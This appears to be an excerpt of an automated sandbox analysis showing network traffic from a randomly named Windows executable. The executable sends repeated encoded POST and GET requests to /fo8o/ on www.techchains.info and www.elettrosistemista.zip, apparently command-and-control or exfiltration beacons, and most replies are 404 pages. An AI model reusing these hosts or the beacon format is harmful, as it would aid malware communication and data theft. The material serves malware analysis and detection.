                                                                                    Jan 7, 2025 15:34:31.104932070 CET1236INData Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                    Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchi1062ng for!"><link rel="icon" type="image/png" href="//img.
                                                                                    Jan 7, 2025 15:34:31.104943037 CET1236INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d
                                                                                    Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
                                                                                    Jan 7, 2025 15:34:31.104958057 CET1236INData Raw: 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e
                                                                                    Data Ascii: h]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:n
                                                                                    Jan 7, 2025 15:34:31.104974031 CET896INData Raw: 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c
                                                                                    Data Ascii: in-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet
                                                                                    Jan 7, 2025 15:34:31.104988098 CET1236INData Raw: 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68
                                                                                    Data Ascii: ement-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#0a48ff;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webar
                                                                                    Jan 7, 2025 15:34:31.105000973 CET1236INData Raw: 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 38 70 78 3b 63 6f 6c 6f 72 3a 23 36 33 38 32 39 36 7d 2e 63
                                                                                    Data Ascii: ter;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer__content-text,.container-disclaimer a{font-size:1
                                                                                    Jan 7, 2025 15:34:31.105012894 CET1236INData Raw: 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f
                                                                                    Data Ascii: ontent-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px
                                                                                    Jan 7, 2025 15:34:31.105025053 CET1236INData Raw: 2e 33 73 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69
                                                                                    Data Ascii: .3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:
                                                                                    Jan 7, 2025 15:34:31.105133057 CET1236INData Raw: 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d
                                                                                    Data Ascii: d:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);tra
                                                                                    Jan 7, 2025 15:34:31.109899998 CET1044INData Raw: 65 61 72 63 68 62 6f 78 50 61 74 68 22 3a 22 2f 2f 77 77 77 2e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2e 70 68 70 22 2c 22 73 65 61 72 63 68 50 61 72 61 6d 73 22 3a 7b 22 73 65 73 22 3a 22 59 33 4a 6c 50 54 45 33 4d
                                                                                    Data Ascii: earchboxPath":"//www.rssnewscast.com/parking.php","searchParams":{"ses":"Y3JlPTE3MzYyNjA0NzEmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjc3ZDNiNzZmMmI2NzUuNjAxOTQyNTYmdGFzaz1zZWFyY2gmZG9tYWluPXJzc25ld3NjYXN0LmNvbSZhX2lkPTEmc2Vzc2lvbj1pWU1MMmt1MnR3YmZqdD


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.54998966.29.149.46803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:34:44.592056990 CET783OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d
                                                                                    Data Ascii: FPJps=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
                                                                                    Jan 7, 2025 15:34:45.210248947 CET637INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:45 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.54999066.29.149.46803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:34:47.136085987 CET803OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 51 2f 68 77 54 33 72 7a 46 43 45 71 45 6a 36 6c 52 4e 63 71 31 55 39 69 56 32 62 32 58 2f 52 73 2b 46 6d 46 4e
                                                                                    Data Ascii: FPJps=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
                                                                                    Jan 7, 2025 15:34:47.750137091 CET637INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:47 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.54999166.29.149.46803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:34:49.661007881 CET1820OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 31 5a 31 7a 56 4d 79 39 68 4d 2f 32 39 50 59 42 6b 57 65 67 36 34 30 57 38 32 68 53 35 62 52 2b 37 33 2f 70 31 59 78 46 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 30 4f 63 45 34 33 4a 57 57 37 4e 71 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 [TRUNCATED]
                                                                                    Data Ascii: FPJps=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx1Z1zVMy9hM/29PYBkWeg640W82hS5bR+73/p1YxFS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp0OcE43JWW7NqLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpqTvXwoZrEGGveh1YUvD1M9uwhS2Djxkp2e8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQpjD2Gsu3STmTn34rqvP3gyE99T1zbRN89ecSSpiwgrnQGzxJxojkTHtDvbDPc2mGlo/980AbVDdw2V4nCfsT9slapAKaq7EEGSeL5i5bH26IQFj/h5ste+eT38btOkmrSX2Uhvlx7+D+TUFcb0rOFOgx6pWk/tKyNXB3rpiYyOR3CiXEqvkhsCKuR2XyVnr3LLe3yV8xHwOTAsZlk9Nr/Hv2Em+zLzYgGBbMENFa0u3f1ylUJeHH8+xGvGM590iI5Uth1I3mxhoJAWDEtppY9LEAiRV+61TFKzUpnM/NRdGOhW5gQEEIRQerBC2R6JTJSEhRMdJ2qTrSzwMCv6VK/n9JXBnu0IG5JtM4G4aYE6Gxt6X1aPY/iCWvNrPXZ4pqgS5iXxHEzdRdodsc9HffbWjYC+3vYu6i5JjkxnT4vfwdN4eDxFbB6sazM4ctju758/LnwlpcqPUKQL9J0uN1KUOJXUXxOtQEXmVLwJAtDjqkYSHfXcx//o/Hx0FG1qN10o4BtUTVzxSF [TRUNCATED]
                                                                                    Jan 7, 2025 15:34:50.270564079 CET637INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:50 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.54999266.29.149.46803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:34:52.196084023 CET520OUTGET /fo8o/?FPJps=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&vVyTz=x4ZDmHH0 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.techchains.info
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 7, 2025 15:34:52.925978899 CET652INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:52 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.549993195.110.124.133803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:34:58.018270969 CET801OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 53 30 5a 7a 49 56 54 58 76 4b 5a 37 6d 56 63 63 63 59 53 44 52 4c 2b 39 4a 4d 44 5a 2f 48 79 67 4b 62 4b 62 65 45 3d
